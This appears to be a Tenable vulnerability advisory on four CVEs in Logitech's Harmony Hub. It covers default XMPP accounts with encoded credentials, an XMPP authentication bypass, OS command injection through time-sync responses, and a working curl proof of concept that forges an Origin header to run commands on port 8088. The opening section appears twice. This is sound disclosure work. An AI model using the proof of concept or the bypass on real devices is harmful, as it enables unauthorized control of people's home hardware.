### Synopsis Tenable found multiple vulnerabilities in Logitech's Harmony Hub. #### CVE-2018-15720: XMPP Default Accounts The XMPP server contains two undocumented default accounts. The accounts have the same privileges as any normal authenticated user. ``` File: luaworks/tasks/connectserver/core/xmppconnection.lua.out.lua Function: processAuthenticate = function(self, str) -- function num : 0_12 , upvalues : AUTH_GUEST, AUTH_YES, AUTH_NO if str == "AGd1ZXN0AGd1ZXN0" or str == "Z3Vlc3QAZ3Vlc3QA" then self.clientJid = "guest" self.authenticated = AUTH_GUEST ``` #### CVE-2018-15721: XMPP Authentication Bypass A crafted XMPP request can be used to bypass authentication. When an XMPP request doesn't contain an *oa* element to initialize the identity variable, it remains uninitialized. The authenticate function will return any username passed to it. ``` File: luaworks/tasks/connectserver/core/xmppconnection.lua.out.lua Function: processAuthenticate = function(self, str) ... if...
### Synopsis Tenable found multiple vulnerabilities in Logitech's Harmony Hub. #### CVE-2018-15720: XMPP Default Accounts The XMPP server contains two undocumented default accounts. The accounts have the same privileges as any normal authenticated user. ``` File: luaworks/tasks/connectserver/core/xmppconnection.lua.out.lua Function: processAuthenticate = function(self, str) -- function num : 0_12 , upvalues : AUTH_GUEST, AUTH_YES, AUTH_NO if str == "AGd1ZXN0AGd1ZXN0" or str == "Z3Vlc3QAZ3Vlc3QA" then self.clientJid = "guest" self.authenticated = AUTH_GUEST ``` #### CVE-2018-15721: XMPP Authentication Bypass A crafted XMPP request can be used to bypass authentication. When an XMPP request doesn't contain an *oa* element to initialize the identity variable, it remains uninitialized. The authenticate function will return any username passed to it. ``` File: luaworks/tasks/connectserver/core/xmppconnection.lua.out.lua Function: processAuthenticate = function(self, str) ... if self:authenticate(str) then self.clientJid = "1111" self.authenticated = AUTH_YES ... authenticate = function(self, userName) -- function num : 0_11 if not self.identity then return userName ... processHlapiRequest = function(self, cmd, parameters) ... if (response.data).identity then self.identity = (response.data).identity ``` #### CVE-2018-15722: Remote Server OS Command Injection On boot, the device makes a time synchronization request to a remote server. The server's response is eventually used in an operating system shell command via the Lua os.execute function in **timemanager.lua**. A remote attacker is able to inject OS commands due to lack of validation. #### CVE-2018-15723: Crafted HTTP Request Application Command Injection A crafted HTTP request allows a remote unauthenticated attacker to execute application level commands (e.g. *harmony.system?systeminfo*). HTTP POST requests to port 8088 with a forged HTTP origin header can are implicitly trusted by the device. A proof of concept follows: ``` curl -d "{\"cmd\":\"harmony.system?systeminfo\"}" -H "Origin: .myharmony.com" -H "Content-Type: application/json" "http://192.168.0.176:8088" {"msg":"OK","data":{"unit_id":"20170121214639-000143","fw_type":"0x00","fw_ver":"4.15.193","arch":"0x11","hw_ver":"0x00","usb_product_id":"0xC129","skin":"106","usb_vendor_id":"0x046D"},"code":"200"} ```
